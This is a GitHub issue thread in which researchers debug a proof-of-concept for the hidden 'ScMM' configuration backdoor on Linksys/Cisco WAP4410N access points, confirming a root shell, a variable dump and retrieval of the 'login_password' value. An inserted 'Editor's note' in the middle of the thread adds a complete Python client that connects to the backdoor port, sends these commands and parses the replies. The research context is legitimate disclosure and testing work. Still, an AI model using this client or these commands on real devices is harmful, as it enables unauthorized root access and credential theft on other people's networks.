WAP4410N #11

Closed
matthew1471 opened this Issue Jan 2, 2014 · 24 comments

Comments

4 participants

matthew1471 commented Jan 2, 2014

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1

elvanderb commented Jan 2, 2014

Strange... I'll investigate :)
Is there any error/message?

matthew1471 commented Jan 2, 2014

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here: http://filebin.ca/17UJu55XztDv/Capture.pcapng

elvanderb commented Jan 2, 2014

No, thank you, I'll search the firmware.

matthew1471 commented Jan 2, 2014

Okay thanks :-). Let me know if I can help.

elvanderb commented Jan 2, 2014

The binary in your firmware has all the symbols :) nice
I had a quick look at your version of scfgmgr and it seems to work like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell; could you please test it on your router when it's up?

matthew1471 commented Jan 2, 2014

Certainly will, thanks! Let me know when it's up.

elvanderb commented Jan 2, 2014

Updated, could you test it and paste the result?

elvanderb commented Jan 2, 2014

you can also try some commands like 'ps'

matthew1471 commented Jan 2, 2014

```
backdoorolol.py

Traceback (most recent call last):
  File "backdoorolol.py", line 41, in <module>
    print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1]
  File "backdoorolol.py", line 19, in send_message
    assert(sig == 0x53634D4D)
AssertionError
```

matthew1471 commented Jan 2, 2014

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

elvanderb commented Jan 2, 2014

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really badly coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

elvanderb commented Jan 2, 2014

Could you test the latest version please?

matthew1471 commented Jan 2, 2014

Needed to bug-fix this line:

```python
elif sig == 0X4D4D6353 :
```

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

elvanderb commented Jan 2, 2014

Oh yes, my bad :)
You are welcome, thank you for your testing and report :)

matthew1471 commented Jan 2, 2014

No, thank you :-)

Can you see from the firmware if there's a getvar function similar to the one on yours?

elvanderb commented Jan 2, 2014

You can use command 1 to dump all the available variables; the command numbers are the same :)
Command to use to dump all the vars:

```python
send_message(s, endianness, 1) # dump all the variables
```

If I wasn't lazy I would code a real PoC with command line parameters :D

matthew1471 commented Jan 3, 2014

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:

```python
print send_message(s, endianness, 2, "login_password")[1]
```

The backdoor seems a bit unstable: if you try executing something it doesn't like, it disconnects you, and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me connect until I rebooted the AP).

Here's the contents of /bin/

```
ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox
```

and the supported features of busybox:

```
busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs
```
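Editor's note: the exchange above pins down enough of the scfgmgr protocol to write it out. The added example below is not elvanderb's PoC nor matthew1471's code; it is a Python 3 sketch of the wire format as this thread describes it: a request header of three 32-bit integers (the "ScMM" signature 0x53634D4D, the command number, the payload length) in the device's native byte order, a reply header of signature, ret_val and ret_len, and the command numbers confirmed here (1 dumps all variables, 2 reads one variable such as "login_password", 7 runs a shell command). Instead of asserting on one signature constant, it infers the byte order from the signature bytes of every reply, which is exactly the big-endian versus little-endian mismatch matthew1471 hit (0x4d4d6353 is "ScMM" read little-endian). The exact header layout, the meaning of ret_val, and the port number 32764 are assumptions taken from the PoC's traceback and repository name, not from this page; the device reply used in the test is constructed.

```python
import socket
import struct

# "ScMM" as the little-endian device emits it and the PoC compares it.
SCMM_SIG = 0x53634D4D
# The same four bytes emitted by a big-endian device and read little-endian:
# the 0x4d4d6353 value reported in the thread.
SCMM_SIG_SWAPPED = 0x4D4D6353
BACKDOOR_PORT = 32764  # assumption: not stated on this page

# Command numbers confirmed in the thread.
CMD_DUMP_VARS = 1  # dump all configuration variables
CMD_GET_VAR = 2    # read one variable by name, e.g. "login_password"
CMD_SHELL = 7      # run a shell command

HEADER_LEN = 12    # three 32-bit ints: signature, command or ret_val, length (assumed layout)


def build_request(endianness, cmd, payload=b""):
    """Serialise sig, cmd, len(payload) in the given byte order, then the payload."""
    if endianness not in ("<", ">"):
        raise ValueError("endianness must be '<' or '>'")
    if isinstance(payload, str):
        payload = payload.encode()
    return struct.pack(endianness + "III", SCMM_SIG, cmd, len(payload)) + payload


def detect_endianness(sig_bytes):
    """Infer the device byte order from the 4 signature bytes; None if not ScMM."""
    (sig_le,) = struct.unpack("<I", sig_bytes[:4])
    if sig_le == SCMM_SIG:
        return "<"
    if sig_le == SCMM_SIG_SWAPPED:
        return ">"
    return None


def parse_response(data):
    """Parse a complete reply buffer into (endianness, ret_val, payload)."""
    if len(data) < HEADER_LEN:
        raise ValueError("short header: %d bytes" % len(data))
    endianness = detect_endianness(data[:4])
    if endianness is None:
        raise ValueError("not a ScMM response: %r" % (data[:4],))
    _sig, ret_val, ret_len = struct.unpack(endianness + "Iii", data[:HEADER_LEN])
    if ret_len < 0 or len(data) < HEADER_LEN + ret_len:
        raise ValueError("truncated payload: want %d bytes" % ret_len)
    return endianness, ret_val, data[HEADER_LEN:HEADER_LEN + ret_len]


def fake_device_response(endianness, ret_val, payload):
    """Constructed sample: what a device of the given byte order would send back."""
    return struct.pack(endianness + "Iii", SCMM_SIG, ret_val, len(payload)) + payload


def recv_exact(sock, n):
    """Read exactly n bytes or raise; the PoC's recv_all did the same job."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed after %d bytes" % len(buf))
        buf += chunk
    return buf


def send_message(sock, endianness, cmd, payload=b""):
    """Send one command; return (byte order seen in the reply, ret_val, payload).

    The byte order is re-detected from every reply, so a wrong guess surfaces
    as a readable error rather than the bare AssertionError in the thread.
    """
    sock.sendall(build_request(endianness, cmd, payload))
    header = recv_exact(sock, HEADER_LEN)
    seen = detect_endianness(header[:4])
    if seen is None:
        raise ValueError("unexpected signature %r; not a ScMM service?" % (header[:4],))
    _sig, ret_val, ret_len = struct.unpack(seen + "Iii", header)
    body = recv_exact(sock, ret_len) if ret_len > 0 else b""
    return seen, ret_val, body


def probe(host, port=BACKDOOR_PORT, timeout=5.0):
    """Detect the byte order from the first reply, then re-issue the variable
    dump in that order so the command field is interpreted as intended."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        seen, ret_val, body = send_message(sock, "<", CMD_DUMP_VARS)
        if seen != "<":
            seen, ret_val, body = send_message(sock, seen, CMD_DUMP_VARS)
        return seen, ret_val, body
```

The thread reports that the service drops the connection on input it dislikes and can refuse further connections until the AP is rebooted, so treat `probe` as a one-shot check rather than something to retry in a loop; the pure functions (`build_request`, `detect_endianness`, `parse_response`) can be exercised against a saved PCAP without touching a device.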

elvanderb commented Jan 3, 2014

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

matthew1471 commented Jan 3, 2014

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering, but given our endian discovery, does your list of "Backdoor is not working in" need to be re-checked with the new code?

elvanderb commented Jan 3, 2014

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just pushed a new version that fixes some bugs.

matthew1471 commented Jan 3, 2014

elvanderb commented Jan 3, 2014

woops, fixed :)

avsavchenko commented Jan 23, 2014

Doesn't work with new firmware 2.0.7.4

an3k commented Jan 24, 2014

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on its own. It was just a "brand" name Cisco used for their SOHO products.
